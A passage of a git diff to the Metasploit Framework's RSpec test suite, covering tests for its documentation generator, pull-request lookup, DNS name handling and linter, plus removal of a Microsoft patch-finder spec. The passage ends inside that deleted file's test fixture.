good_pull_requests } + let(:mod_refs) { ['URL', 'http://example.com'] } + let(:mod_platforms) { 'win' } + let(:mod_options) { { 'RHOST' => rhost_option } } + let(:mod_normal_rank) { 300 } + let(:mod_type) { 'exploit' } + + let(:good_pull_requests) do + { + '1234' => { title: 'Merged Pull Request' } + } + end + + let(:mod_targets) do + target = double('target') + allow(target).to receive(:name).and_return('Automatic') + [target] + end + + let(:bad_pull_requests) do + exp = Msf::Util::DocumentGenerator::PullRequestFinder::Exception.new + allow(exp).to receive(:message).and_return('GITHUB_OAUTH_TOKEN') + exp + end + + let(:rhost_option) do + owner = double('Msf::Exploit::Remote::SMB::Client') + option = double('Msf::OptAddress') + allow(option).to receive(:name).and_return('RHOST') + allow(option).to receive(:advanced).and_return(false) + allow(option).to receive(:evasion).and_return(false) + allow(option).to receive(:required).and_return(true) + allow(option).to receive(:desc).and_return('The target address') + allow(option).to receive(:default).and_return(nil) + allow(option).to receive(:owner).and_return(owner) + option + end + + let(:msf_mod) do + mod = double('Msf::Module') + mod_info = { 'Author' => mod_authors, 'Platform' => mod_platforms } + allow(mod).to receive(:description).and_return(mod_description) + allow(mod).to receive(:module_info).and_return(mod_info) + allow(mod).to receive(:fullname).and_return(mod_fullname) + allow(mod).to receive(:name).and_return(mod_name) + allow(mod).to receive(:references).and_return(mod_refs) + allow(mod).to receive(:platforms).and_return(mod_platforms) + allow(mod).to receive(:authors).and_return(mod_authors) + allow(mod).to receive(:rank).and_return(mod_normal_rank) + allow(mod).to receive(:options).and_return(mod_options) + allow(mod).to receive(:type).and_return(mod_type) + allow(mod).to receive(:shortname).and_return(mod_shortname) + allow(mod).to receive(:targets).and_return(mod_targets) + mod + end + + + subject do + described_class.new + end + + describe '#get_md_content' do + context 'when metadata is given' do + it 'returns the documentation in HTML' do + items = { + mod_description: msf_mod.description, + mod_authors: msf_mod.send(:module_info)['Author'], + mod_fullname: msf_mod.fullname, + mod_name: msf_mod.name, + mod_pull_requests: good_pull_requests, + mod_refs: msf_mod.references, + mod_rank: msf_mod.rank, + mod_platforms: msf_mod.send(:module_info)['Platform'], + mod_options: msf_mod.options, + mod_demo: msf_mod + } + expect(subject.get_md_content(items, '')).to include('<html>') + end + end + end + + describe '#load_css' do + it 'loads CSS from file' do + expect(subject.send(:load_css)).to include('color: #0069d6') + end + end + + describe '#md_to_html' do + let(:md) do + %Q|# Hello world!| + end + + context 'when a markdown file is given' do + it 'returns the documentation in HTML' do + expect(subject.send(:md_to_html, md, '')).to include('<h1>Hello world!</h1>') + end + end + end + + describe 'normalize_pull_requests' do + context 'when a hash of pull requests are given' do + it 'returns HTML links' do + expect(subject.send(:normalize_pull_requests, good_pull_requests)).to include('* <a href=') + end + end + + context 'when PullRequestFinder::Exception is raised' do + it 'includes a how-to link in the error message' do + how_to_link = 'https://help.github.com/articles/creating-an-access-token-for-command-line-use/' + expect(subject.send(:normalize_pull_requests, bad_pull_requests)).to include(how_to_link) + end + end + end + + describe 'normalize_options' do + context 'when datastore options are given' do + it 'returns a list of options in HTML' do + expect(subject.send(:normalize_options, msf_mod.options)).to include('* RHOST - The target address') + end + end + end + + describe 'normalize_description' do + context 'when a description is a long one-liner' do + it 'returns the wrapped the description' do + desc = 'description ' * 20 + expect(subject.send(:normalize_description, desc)).to include("\ndescription") + end + end + end + + describe 'normalize_authors' do + context 'when an array of authors is given' do + it 'returns the author list in markdown' do + expect(subject.send(:normalize_authors, Rex::Text.html_decode(msf_mod.authors))).to include('* ') + end + end + end + + describe 'normalize_targets' do + context 'when an array of targets is given' do + it 'returns the target list in HTML' do + expect(subject.send(:normalize_targets, msf_mod.targets)).to include('* Automatic') + end + end + end + + describe 'normalize_references' do + context 'when an array of references is given' do + it 'returns the reference list in HTML' do + expect(subject.send(:normalize_references, msf_mod.references)).to include('* <a href=') + end + end + end + + describe 'normalize_platforms' do + context 'when platforms win and linux are given' do + it 'returns the markdown with windows and linux' do + platforms = ['win', 'linux'] + + platforms.each do |platform| + expect(subject.send(:normalize_platforms, platforms)).to include("* #{platform}") + end + end + end + + context 'when a platform as a string is given' do + it 'returns the platform' do + expect(subject.send(:normalize_platforms, msf_mod.platforms)).to eq(mod_platforms) + end + end + end + + describe 'normalize_rank' do + context 'when a rank is given' do + it 'returns the rank' do + expect(subject.send(:normalize_rank, msf_mod.rank)).to include('Normal') + end + + it 'includes a wiki about exploit ranks' do + wiki = 'https://github.com/rapid7/metasploit-framework/wiki/Exploit-Ranking' + expect(subject.send(:normalize_rank, msf_mod.rank)).to include(wiki) + end + end + end + + describe 'load_demo_template' do + context 'when a BrowserExploitServer demo template path is given' do + it 'returns the demo' do + template = Msf::Util::DocumentGenerator::DocumentNormalizer::BES_DEMO_TEMPLATE + expect(subject.send(:load_demo_template, msf_mod, template)).to include('This module is also supported by Browser Autopwn 2') + end + end + end + + describe 'normalize_demo_output' do + context 'when the module is a kind of Msf::Exploit::Remote::HttpServer' do + it 'returns the demo of HTTPSERVER_DEMO_TEMPLATE' do + template = Msf::Util::DocumentGenerator::DocumentNormalizer::HTTPSERVER_DEMO_TEMPLATE + expect(subject.send(:load_demo_template, msf_mod, template)).to include("use #{mod_fullname}") + end + end + + context 'when the module is a remote exploit' do + it 'returns the demo of REMOTE_EXPLOIT_DEMO_TEMPLATE' do + template = Msf::Util::DocumentGenerator::DocumentNormalizer::REMOTE_EXPLOIT_DEMO_TEMPLATE + expect(subject.send(:load_demo_template, msf_mod, template)).to include('it looks like this is a remote exploit module') + end + end + + context 'when the module is a kind of Msf::Exploit::Local' do + it 'returns the content of LOCALEXPLOIT_DEMO_TEMPLATE' do + template = Msf::Util::DocumentGenerator::DocumentNormalizer::LOCALEXPLOIT_DEMO_TEMPLATE + expect(subject.send(:load_demo_template, msf_mod, template)).to include('To run a local exploit, make sure you are at the msf prompt.') + end + end + + context 'when the module is a kind of Msf::Post' do + it 'returns the demo of POST_DEMO_TEMPLATE' do + template = Msf::Util::DocumentGenerator::DocumentNormalizer::POST_DEMO_TEMPLATE + expect(subject.send(:load_demo_template, msf_mod, template)).to include('There are two ways to execute this post module') + end + end + + context 'when the module is a kind of Msf::Payload' do + it 'returns the demo of PAYLOAD_DEMO_TEMPLATE' do + template = Msf::Util::DocumentGenerator::DocumentNormalizer::PAYLOAD_DEMO_TEMPLATE + expect(subject.send(:load_demo_template, msf_mod, template)).to include('> generate') + end + end + + context 'when the module is a kind of Msf::Auxiliary::Scanner' do + it 'returns the demo of AUXILIARY_SCANNER_DEMO_TEMPLATE' do + template = Msf::Util::DocumentGenerator::DocumentNormalizer::AUXILIARY_SCANNER_DEMO_TEMPLATE + expect(subject.send(:load_demo_template, msf_mod, template)).to include('This module is a scanner module') + end + end + + context 'when the module does not have a known kind' do + it 'returns the demo of GENERIC_DEMO_TEMPLATE' do + template = Msf::Util::DocumentGenerator::DocumentNormalizer::GENERIC_DEMO_TEMPLATE + expect(subject.send(:load_demo_template, msf_mod, template)).to include('msf exploit') + end + end + end + +end diff --git a/spec/lib/msf/util/document_generator/pull_request_finder_spec.rb b/spec/lib/msf/util/document_generator/pull_request_finder_spec.rb new file mode 100644 index 0000000000..edd19163b8 --- /dev/null +++ b/spec/lib/msf/util/document_generator/pull_request_finder_spec.rb @@ -0,0 +1,162 @@ +require 'rex' +require 'msf/util/document_generator' +require 'octokit' +require 'net/http' + +RSpec.describe Msf::Util::DocumentGenerator::PullRequestFinder do + + let(:author_name) { 'name' } + + let(:commit) do + c = double('commit') + allow(c).to receive(:author).and_return({author: author_name, login: author_name}) + allow(c).to receive(:sha).and_return('sha') + c + end + + let(:commits) do + [ commit ] + end + + let(:pr_num) { '5486' } + + let(:html) do + %Q| + <html> + <head></head> + <body> + <li class="pull-request">(<a href="/rapid7/metasploit-framework/pull/#{pr_num}" title="Merged Pull Request: adobe_flash_copy_pixels_to_byte_array: Execution from the flash renderer / Windows 8.1">##{pr_num}</a>)</li> + </body> + </html> + | + end + + subject do + obj = described_class.new + obj.git_access_token = 'GITHUB_AUTH_TOKEN' + + octo = Octokit::Client.new + allow(octo).to receive(:commits).and_return(commits) + allow(obj).to receive(:git_client).and_return(octo) + obj + end + + let(:http_response) do + req = double('HttpResponse') + allow(req).to receive(:body).and_return(html) + req + end + + let(:module_name) { 'modules/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb' } + + let(:msf_mod) do + mod = double('Msf::Module') + init = double('Msf::Module#initialize') + allow(init).to receive(:source_location).and_return([ module_name ]) + allow(mod).to receive(:method).with(any_args).and_return(init) + mod + end + + before(:each) do + allow(ENV).to receive(:has_key?).and_return(true) + allow_any_instance_of(Net::HTTP).to receive(:request).with(any_args).and_return(http_response) + end + + describe '#initialize' do + it 'sets the owner property' do + expect(subject.owner).to eq('rapid7') + end + + it 'sets the repository' do + expect(subject.repository).to eq('rapid7/metasploit-framework') + end + + it 'sets the branch' do + expect(subject.branch).to eq('master') + end + + it 'sets the git access token' do + subject1 = described_class.new + subject1.git_access_token = 'FAKE KEY' + subject2 = described_class.new + expect(subject2.git_access_token).not_to eq(subject1.git_access_token) + end + + it 'sets Octokit::Client' do + expect(subject.git_client).to be_kind_of(Octokit::Client) + end + end + + describe '#search' do + context 'when a module is given' do + it 'returns a hash of pull requests' do + result = subject.search(msf_mod) + expect(result).to be_kind_of(Hash) + expect(result.keys.first).to eq(pr_num) + expect(result.first[1][:number]).to eq(pr_num) + expect(result.first[1][:title]).to include('Merged Pull Request') + end + end + end + + describe '#get_normalized_module_name' do + context 'when a module is given' do + it 'returns the module name' do + expect(subject.send(:get_normalized_module_name, msf_mod)).to eq(module_name) + end + end + end + + describe '#get_commits_from_file' do + context 'when a module path is given' do + it 'returns commits' do + expect(subject.send(:get_commits_from_file, module_name)).to eq(commits) + end + end + end + + describe '#get_author' do + context 'when a commit is given' do + it 'returns the author name' do + expect(subject.send(:get_author, commit)).to eq(author_name) + end + end + end + + describe '#is_author_blacklisted?' do + context 'when a commit authored by tabassassin is given' do + it 'returns true' do + c = double('commit') + allow(c).to receive(:author).and_return({author: 'tabassassin', login: 'tabassassin'}) + expect(subject.send(:is_author_blacklisted?, c)).to be_truthy + end + end + + context 'when a commit authored by a human is given' do + it 'returns false' do + expect(subject.send(:is_author_blacklisted?, commit)).to be_falsey + end + end + end + + describe '#get_pull_requests_from_commits' do + context 'when commits are given' do + it 'returns pull requests' do + pr = subject.send(:get_pull_requests_from_commits, commits) + expect(pr).to be_kind_of(Hash) + expect(pr.keys.first).to eq(pr_num) + end + end + end + + describe '#get_pull_request_from_commit' do + context 'when a commit is given' do + it 'returns a pull request' do + pr = subject.send(:get_pull_request_from_commit, commit) + expect(pr).to be_kind_of(Hash) + expect(pr[:number]).to eq(pr_num) + end + end + end + +end diff --git a/spec/lib/net/dns/names/names_spec.rb b/spec/lib/net/dns/names/names_spec.rb new file mode 100644 index 0000000000..96ea39a86f --- /dev/null +++ b/spec/lib/net/dns/names/names_spec.rb @@ -0,0 +1,129 @@ +require 'msf/core' + +RSpec.describe Net::DNS::Names do + subject do + obj = Object.new + obj.extend(described_class) + end + + describe '#dn_expand' do + context 'when offset is great than packet length' do + let(:packet) do + 'AAAAA' + end + + let(:offset) do + 10 + end + + it 'raises an ExpandError exception' do + expect { subject.dn_expand(packet, offset) }.to raise_exception(ExpandError) + end + end + + context 'when packet length is less than offset + INT16SZ' do + let(:packet) do + "\xc0" + end + + let(:offset) do + 0 + end + + it 'raises an ExpandError exception' do + expect { subject.dn_expand(packet, offset) }.to raise_exception(ExpandError) + end + end + + context 'when packet length is less than offset + packet length' do + let(:packet) do + 'AAAAA' + end + + let(:offset) do + 4 + end + + it 'raises an ExpandError exception' do + expect { subject.dn_expand(packet, offset) }.to raise_exception(ExpandError) + end + end + end + + describe '#pack_name' do + context 'when name data size is larger than 255 bytes' do + let(:name) do + 'A' * (255+1) + end + + it 'raises an ArgumentError exception' do + expect { subject.pack_name(name) }.to raise_exception(ArgumentError) + end + end + + context 'when label data is larger than 63 bytes' do + let(:name) do + 'A' * (63+1) + '.' + end + + it 'raises an ArgumentError exception' do + expect { subject.pack_name(name) }.to raise_exception(ArgumentError) + end + end + end + + describe '#names_array' do + let(:name) do + "AAA.AAA" + end + + it 'returns an Array' do + expect(subject.names_array(name)).to be_kind_of(Array) + end + end + + describe '#dn_comp' do + let(:name) do + 'AAAA' + end + + let(:offset) do + 0 + end + + let(:compnames) do + {} + end + + it 'returns 3 values' do + v = subject.dn_comp(name, offset, compnames) + expect(v.length).to eq(3) + expect(v[0]).to be_kind_of(String) + expect(v[1]).to be_kind_of(Fixnum) + expect(v[2]).to be_kind_of(Hash) + end + end + + describe '#valid?' do + context 'when FQDN is valid' do + let(:fqdn) do + 'example.com' + end + + it 'returns the FQDN' do + expect(subject.valid?(fqdn)).to eq(fqdn) + end + + end + + context 'when FQDN is not valid' do + let(:fqdn) do + 'INVALID' + end + + it 'raises ArgumentError exception' do + expect { subject.valid?(fqdn) }.to raise_exception(ArgumentError) + end + end + end +end \ No newline at end of file diff --git a/spec/lib/rex/post/meterpreter/packet_parser_spec.rb b/spec/lib/rex/post/meterpreter/packet_parser_spec.rb index 4be1ce6a77..1497ebaa9e 100644 --- a/spec/lib/rex/post/meterpreter/packet_parser_spec.rb +++ b/spec/lib/rex/post/meterpreter/packet_parser_spec.rb @@ -20,7 +20,7 @@ RSpec.describe Rex::Post::Meterpreter::PacketParser do it "should initialise with expected defaults" do expect(parser.send(:raw)).to eq "" - expect(parser.send(:hdr_length_left)).to eq 8 + expect(parser.send(:hdr_length_left)).to eq 12 expect(parser.send(:payload_length_left)).to eq 0 end diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb index 644e576a5c..454850ee86 100644 --- a/spec/lib/rex/proto/http/client_request_spec.rb +++ b/spec/lib/rex/proto/http/client_request_spec.rb @@ -151,7 +151,26 @@ RSpec.describe Rex::Proto::Http::ClientRequest do { :set_host_header => { :result => "Host: [2001:DB8::1]:1234\r\n" }, } - ] + ], + + [ + "with modified Content-Length header", + default_options.merge({ + 'headers' => { 'Content-Length' => 1337 } + }), + { + :set_content_len_header => { args: 0, result: ''} + } + ], + + [ + "with 1024 bytes of Content-Length", + default_options, + { + :set_content_len_header => { args: 1024, result: "Content-Length: 1024\r\n"} + } + ], + ].each do |c, opts, expectations| context c do subject(:client_request) { Rex::Proto::Http::ClientRequest.new(opts) } diff --git a/spec/modules/payloads_spec.rb b/spec/modules/payloads_spec.rb index 0bbe2cf9d3..528b41f0da 100644 --- a/spec/modules/payloads_spec.rb +++ b/spec/modules/payloads_spec.rb @@ -1637,16 +1637,6 @@ RSpec.describe 'modules/payloads', :content do reference_name: 'linux/x86/shell_reverse_tcp' end - context 'linux/x86/shell_reverse_tcp2' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'singles/linux/x86/shell_reverse_tcp2' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'linux/x86/shell_reverse_tcp2' - end - context 'mainframe/shell_reverse_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ diff --git a/spec/spec_helper.rb b/spec/spec_helper.rb index 90be4e8a0a..0859ab6424 100644 --- a/spec/spec_helper.rb +++ b/spec/spec_helper.rb @@ -1,4 +1,6 @@ # -*- coding: binary -*- +require 'stringio' + ENV['RAILS_ENV'] = 'test' unless Bundler.settings.without.include?(:coverage) @@ -114,3 +116,25 @@ end Metasploit::Framework::Spec::Constants::Suite.configure! Metasploit::Framework::Spec::Threads::Suite.configure! + +def get_stdout(&block) + out = $stdout + $stdout = tmp = StringIO.new + begin + yield + ensure + $stdout = out + end + tmp.string +end + +def get_stderr(&block) + out = $stderr + $stderr = tmp = StringIO.new + begin + yield + ensure + $stderr = out + end + tmp.string +end diff --git a/spec/tools/dev/msftidy_spec.rb b/spec/tools/dev/msftidy_spec.rb new file mode 100644 index 0000000000..bf9f115f85 --- /dev/null +++ b/spec/tools/dev/msftidy_spec.rb @@ -0,0 +1,48 @@ +require 'spec_helper' + +load Metasploit::Framework.root.join('tools/dev/msftidy.rb').to_path + +RSpec.describe Msftidy do + context "with a tidy auxiliary module" do + let(:auxiliary_tidy) { File.expand_path('modules/auxiliary/auxiliary_tidy.rb', FILE_FIXTURES_PATH) } + let(:msftidy) { Msftidy.new(auxiliary_tidy) } + + before(:each) do + @msftidy_stdout = get_stdout { msftidy.run_checks } + end + + it "outputs nothing" do + expect(@msftidy_stdout).to be_empty + end + end + + context "with an untidy auxiliary module" do + let(:auxiliary_untidy) { File.expand_path('modules/auxiliary/auxiliary_untidy.rb', FILE_FIXTURES_PATH) } + let(:msftidy) { Msftidy.new(auxiliary_untidy) } + + before(:each) do + @msftidy_stdout = get_stdout { msftidy.run_checks } + end + + it "ERRORs when invalid superclass" do + expect(@msftidy_stdout).to match(/ERROR.*Invalid super class for auxiliary module/) + end + + it "WARNINGs when specifying Rank" do + expect(@msftidy_stdout).to match(/WARNING.*Rank/) + end + end + + context "with a tidy payload module" do + let(:payload_tidy) { File.expand_path('modules/payloads/payload_tidy.rb', FILE_FIXTURES_PATH) } + let(:msftidy) { Msftidy.new(payload_tidy) } + + before(:each) do + @msftidy_stdout = get_stdout { msftidy.run_checks } + end + + it "outputs nothing" do + expect(@msftidy_stdout).to be_empty + end + end +end diff --git a/spec/tools/egghunter_spec.rb b/spec/tools/egghunter_spec.rb index efcebca0e1..d56dac3ecf 100644 --- a/spec/tools/egghunter_spec.rb +++ b/spec/tools/egghunter_spec.rb @@ -1,6 +1,5 @@ load Metasploit::Framework.root.join('tools/exploit/egghunter.rb').to_path - -require 'stringio' +require 'spec_helper' RSpec.describe Egghunter do @@ -16,17 +15,6 @@ RSpec.describe Egghunter do describe '#run' do - def get_stdout(&block) - out = $stdout - $stdout = fake = StringIO.new - begin - yield - ensure - $stdout = out - end - fake.string - end - let(:default_opts) { { :platform => 'windows', :format => 'c', :eggtag => egg, :arch => 'x86' } } diff --git a/spec/tools/md5_lookup_spec.rb b/spec/tools/md5_lookup_spec.rb index 528f7863cd..f9666d0a0d 100644 --- a/spec/tools/md5_lookup_spec.rb +++ b/spec/tools/md5_lookup_spec.rb @@ -1,4 +1,5 @@ load Metasploit::Framework.root.join('tools/password/md5_lookup.rb').to_path +require 'spec_helper' require 'rex/proto/http/response' require 'stringio' @@ -70,17 +71,6 @@ RSpec.describe Md5LookupUtility do end end - def get_stdout(&block) - out = $stdout - $stdout = fake = StringIO.new - begin - yield - ensure - $stdout = out - end - fake.string - end - # # Tests start here # diff --git a/spec/tools/msu_finder_spec.rb b/spec/tools/msu_finder_spec.rb deleted file mode 100644 index 8f1b498c9c..0000000000 --- a/spec/tools/msu_finder_spec.rb +++ /dev/null @@ -1,662 +0,0 @@ -load Metasploit::Framework.root.join('tools/exploit/msu_finder.rb').to_path - -require 'nokogiri' -require 'uri' - -RSpec.describe MicrosoftPatchFinder do - - before(:example) do - cli = Rex::Proto::Http::Client.new('127.0.0.1') - allow(cli).to receive(:connect) - allow(cli).to receive(:request_cgi) - allow(cli).to receive(:send_recv).and_return(Rex::Proto::Http::Response.new) - allow(Rex::Proto::Http::Client).to receive(:new).and_return(cli) - end - - let(:technet) do - MicrosoftPatchFinder::SiteInfo::TECHNET - end - - let(:microsoft) do - MicrosoftPatchFinder::SiteInfo::MICROSOFT - end - - let(:googleapis) do - MicrosoftPatchFinder::SiteInfo::GOOGLEAPIS - end - - describe MicrosoftPatchFinder::SiteInfo do - context 'Constants' do - context 'TECHNET' do - it 'returns 157.56.148.23 as the IP' do - expect(technet[:ip]).to eq('157.56.148.23') - end - - it 'returns technet.microsoft.com as the vhost' do - expect(technet[:vhost]).to eq('technet.microsoft.com') - end - end - - context 'MICROSOFT' do - it 'returns 104.72.230.162 as the IP' do - expect(microsoft[:ip]).to eq('104.72.230.162') - end - - it 'returns www.microsoft.com as the vhost' do - expect(microsoft[:vhost]).to eq('www.microsoft.com') - end - end - - context 'GOOGLEAPIS' do - it 'returns 74.125.28.95 as the IP' do - expect(googleapis[:ip]).to eq('74.125.28.95') - end - - it 'returns www.googleapis.com as the vhost' do - expect(googleapis[:vhost]).to eq('www.googleapis.com') - end - end - end - end - - describe MicrosoftPatchFinder::Helper do - - def get_stdout(&block) - out = $stdout - $stdout = fake = StringIO.new - begin - yield - ensure - $stdout = out - end - fake.string - end - - def get_stderr(&block) - out = $stderr - $stderr = fake = StringIO.new - begin - yield - ensure - $stderr = out - end - fake.string - end - - subject(:object_helper) do - mod = Object.new - mod.extend MicrosoftPatchFinder::Helper - mod - end - - describe '#print_debug' do - it 'prints a [DEBUG] message' do - output = get_stderr { object_helper.print_debug } - expect(output).to include('[DEBUG]') - end - end - - describe '#print_status' do - it 'prints a [*] message' do - output = get_stderr { object_helper.print_status } - expect(output).to include('[*]') - end - end - - describe '#print_error' do - it 'prints an [ERROR] message' do - output = get_stderr { object_helper.print_error } - expect(output).to include('[ERROR]') - end - end - - describe '#print_line' do - it 'prints a regular message' do - msg = 'TEST' - output = get_stdout { object_helper.print_line(msg) } - expect(output).to eq("#{msg}\n") - end - end - - describe '#send_http_request' do - it 'returns a Rex::Proto::Http::Response object' do - allow(object_helper).to receive(:print_debug) - res = object_helper.send_http_request(MicrosoftPatchFinder::SiteInfo::TECHNET) - expect(res).to be_kind_of(Rex::Proto::Http::Response) - end - end - - end - - describe MicrosoftPatchFinder::PatchLinkCollector do - - let(:ms15_100_html) do - %Q| - <html> - <div id="mainBody"> - <div> - <h2> - <div> - <span>Affected Software</span> - <div class="sectionblock"> - <table> - <tr><td><a href="https://www.microsoft.com/downloads/details.aspx?familyid=1">fake link</a></td></tr> - </table> - </div> - </div> - </h2> - </div> - </div> - </html> - | - end - - let(:ms07_029_html) do - %Q| - <html> - <div id="mainBody"> - <ul> - <li> - <a href="http://technet.microsoft.com">Download the update</a> - </li> - </ul> - </div> - </html> - | - end - - let(:ms03_039_html) do - %Q| - <html> - <div id="mainBody"> - <div> - <div class="sectionblock"> - <p> - <strong>Download locations</strong> - </p> - <ul> - <li> - <a href="http://technet.microsoft.com">Download</a> - </li> - </ul> - </div> - </div> - </div> - </html> - | - end - - let(:ms07_030_html) do - %Q| - <html> - <div id="mainBody"> - <p> - <strong>Affected Software</strong> - </p> - <table> - <tr><td><a href="http://technet.microsoft.com">Download</a></td></tr> - </div> - </html> - | - end - - subject(:patch_link_collector) do - MicrosoftPatchFinder::PatchLinkCollector.new - end - - before(:example) do - allow(patch_link_collector).to receive(:print_debug) - end - - describe '#download_advisory' do - it 'returns a Rex::Proto::Http::Response object' do - res = patch_link_collector.download_advisory('ms15-100') - expect(res).to be_kind_of(Rex::Proto::Http::Response) - end - end - - describe '#get_appropriate_pattern' do - - it 'returns a pattern for ms15-100' do - expected_pattern = '//div[@id="mainBody"]//div//div[@class="sectionblock"]//table//a' - p = patch_link_collector.get_appropriate_pattern(::Nokogiri::HTML(ms15_100_html)) - expect(p).to eq(expected_pattern) - end - - it 'returns a pattern for ms07-029' do - expected_pattern = '//div[@id="mainBody"]//ul//li//a[contains(text(), "Download the update")]' - p = patch_link_collector.get_appropriate_pattern(::Nokogiri::HTML(ms07_029_html)) - expect(p).to eq(expected_pattern) - end - - it 'returns a pattern for ms03-039' do - expected_pattern = '//div[@id="mainBody"]//div//div[@class="sectionblock"]//ul//li//a' - p = patch_link_collector.get_appropriate_pattern(::Nokogiri::HTML(ms03_039_html)) - expect(p).to eq(expected_pattern) - end - - it 'returns a pattern for ms07-030' do - expected_pattern = '//div[@id="mainBody"]//table//a' - p = patch_link_collector.get_appropriate_pattern(::Nokogiri::HTML(ms07_030_html)) - expect(p).to eq(expected_pattern) - end - end - - describe '#get_details_aspx' do - let(:details_aspx) do - res = Rex::Proto::Http::Response.new - allow(res).to receive(:body).and_return(ms15_100_html) - res - end - - it 'returns an URI object to a details aspx' do - links = patch_link_collector.get_details_aspx(details_aspx) - expected_uri = 'https://www.microsoft.com/downloads/details.aspx?familyid=1' - expect(links.length).to eq(1) - expect(links.first).to be_kind_of(URI) - expect(links.first.to_s).to eq(expected_uri) - end - end - - describe '#follow_redirect' do - let(:expected_header) do - { 'Location' => 'http://example.com/' } - end - - let(:http_res) do - res = Rex::Proto::Http::Response.new - allow(res).to receive(:headers).and_return(expected_header) - res - end - - it 'goes to a location based on the Location HTTP header' do - cli = Rex::Proto::Http::Client.new('127.0.0.1') - allow(cli).to receive(:connect) - allow(cli).to receive(:request_cgi) - allow(cli).to receive(:send_recv).and_return(http_res) - allow(Rex::Proto::Http::Client).to receive(:new).and_return(cli) - - expect(patch_link_collector.follow_redirect(technet, http_res).headers).to eq(expected_header) - end - end - - describe '#get_download_page' do - it 'returns a Rex::Proto::Http::Response object' do - uri = URI('http://www.example.com/') - expect(patch_link_collector.get_download_page(uri)).to be_kind_of(Rex::Proto::Http::Response) - end - end - - describe '#get_download_links' do - let(:confirm_aspx) do - %Q| - <html> - <a href="https://www.microsoft.com/en-us/download/confirmation.aspx?id=1">Download</a> - </html> - | - end - - let(:expected_link) do - 'http://download.microsoft.com/download/9/0/6/906BC7A4-7DF7-4C24-9F9D-3E801AA36ED3/Windows6.0-KB3087918-x86.msu' - end - - let(:download_html_res) do - Rex::Proto::Http::Response.new.tap { |response| - allow(response).to receive(:body).and_return( - %Q| - <html> - <a href="#{expected_link}">Click here</a> - </html> - | - ) - } - end - - it 'returns an array of links' do - cli = Rex::Proto::Http::Client.new('127.0.0.1') - allow(cli).to receive(:connect) - allow(cli).to receive(:request_cgi) - allow(cli).to receive(:send_recv).and_return(download_html_res) - allow(Rex::Proto::Http::Client).to receive(:new).and_return(cli) - - expect(patch_link_collector.get_download_links(confirm_aspx).first).to eq(expected_link) - end - end - - describe '#has_advisory?' do - it 'returns true if the page is found' do - res = Rex::Proto::Http::Response.new - expect(patch_link_collector.has_advisory?(res)).to be_truthy - end - - it 'returns false if the page is not found' do - html = %Q| - <html> - We are sorry. The page you requested cannot be found - </html> - | - - res = Rex::Proto::Http::Response.new - allow(res).to receive(:body).and_return(html) - expect(patch_link_collector.has_advisory?(res)).to be_falsey - end - end - - describe '#is_valid_msb?' do - let(:good_msb) do - 'MS15-100' - end - - let(:bad_msb) do - 'MS15-01' - end - - it 'returns true if the MSB format is correct' do - expect(patch_link_collector.is_valid_msb?(good_msb)).to be_truthy - end - - it 'returns false if the MSB format is incorrect' do - expect(patch_link_collector.is_valid_msb?(bad_msb)).to be_falsey - end - - end - - end - - describe MicrosoftPatchFinder::TechnetMsbSearch do - - subject(:technet_msb_search) do - MicrosoftPatchFinder::TechnetMsbSearch.new - end - - before(:example) do - allow_any_instance_of(MicrosoftPatchFinder::TechnetMsbSearch).to receive(:print_debug) - allow_any_instance_of(MicrosoftPatchFinder::TechnetMsbSearch).to receive(:send_http_request) { |info_obj, info_opts, opts| - case opts['uri'] - when /\/en\-us\/security\/bulletin\/dn602597\.aspx/ - html = %Q| - <div class="sb-search"> - <div class="SearchBox"> - <input type="text" id="txtSearch" title="Search Security Bulletins" value="Search Security Bulletins" /> - <input type="button" id="btnSearch" /> - </div> - <select id="productDropdown"> - <option value="-1">All</option> - <option value="10175">Active Directory</option> - <option value="10401">Windows Internet Explorer 10</option> - <option value="10486">Windows Internet Explorer 11</option> - <option value="1282">Windows Internet Explorer 7</option> - <option value="1233">Windows Internet Explorer 8</option> - <option value="10054">Windows Internet Explorer 9</option> - </select> - </div> - | - when /\/security\/bulletin\/services\/GetBulletins/ - html = %Q|{ - "l":1, - "b":[ - { - "d":"9/8/2015", - "Id":"MS15-100", - "KB":"3087918", - "Title":"Vulnerability in Windows Media Center Could Allow Remote Code Execution", - "Rating":"Important" - } - ] - } - | - else - html = '' - end - - res = Rex::Proto::Http::Response.new - allow(res).to receive(:body).and_return(html) - res - } - end - - let(:ie10) do - 'Windows Internet Explorer 10' - end - - let(:ie10_id) do - 10401 - end - - describe '#find_msb_numbers' do - it 'returns an array of found MSB numbers' do - msb = technet_msb_search.find_msb_numbers(ie10) - expect(msb).to be_kind_of(Array) - expect(msb.first).to eq('ms15-100') - end - end - - describe '#search' do - it 'returns search results in JSON format' do - results = technet_msb_search.search(ie10) - expect(results).to be_kind_of(Hash) - expect(results['b'].first['Id']).to eq('MS15-100') - end - end - - describe '#search_by_product_ids' do - it 'returns an array of found MSB numbers' do - results = technet_msb_search.search_by_product_ids([ie10_id]) - expect(results).to be_kind_of(Array) - expect(results.first).to eq('ms15-100') - end - end - - describe '#search_by_keyword' do - it 'returns an array of found MSB numbers' do - results = technet_msb_search.search_by_keyword('ms15-100') - expect(results).to be_kind_of(Array) - expect(results.first).to eq('ms15-100') - end - end - - describe '#get_product_dropdown_list' do - it 'returns an array of products' do - results = technet_msb_search.get_product_dropdown_list - expect(results).to be_kind_of(Array) - expect(results.first).to be_kind_of(Hash) - expected_hash = {:option_value=>"10175", :option_text=>"Active Directory"} - expect(results.first).to eq(expected_hash) - end - end - - end - - describe MicrosoftPatchFinder::GoogleMsbSearch do - - subject(:google_msb_search) do - MicrosoftPatchFinder::GoogleMsbSearch.new - end - - let(:json_data) do - %Q|{ - "kind": "customsearch#search", - "url": { - "type": "application/json", - "template": "" - }, - "queries": { - "request": [ - { - "title": "Google Custom Search - internet", - "totalResults": "1", - "searchTerms": "internet", - "count": 10, - "startIndex": 1, - "inputEncoding": "utf8", - "outputEncoding": "utf8", - "safe": "off", - "cx": "" - } - ] - }, - "context": { - "title": "Technet.microsoft" - }, - "searchInformation": { - "searchTime": 0.413407, - "formattedSearchTime": "0.41", - "totalResults": "1", - "formattedTotalResults": "1" - }, - "items": [ - { - "kind": "customsearch#result", - "title": "Microsoft Security Bulletin MS15-093 - Critical", - "htmlTitle": "Microsoft Security 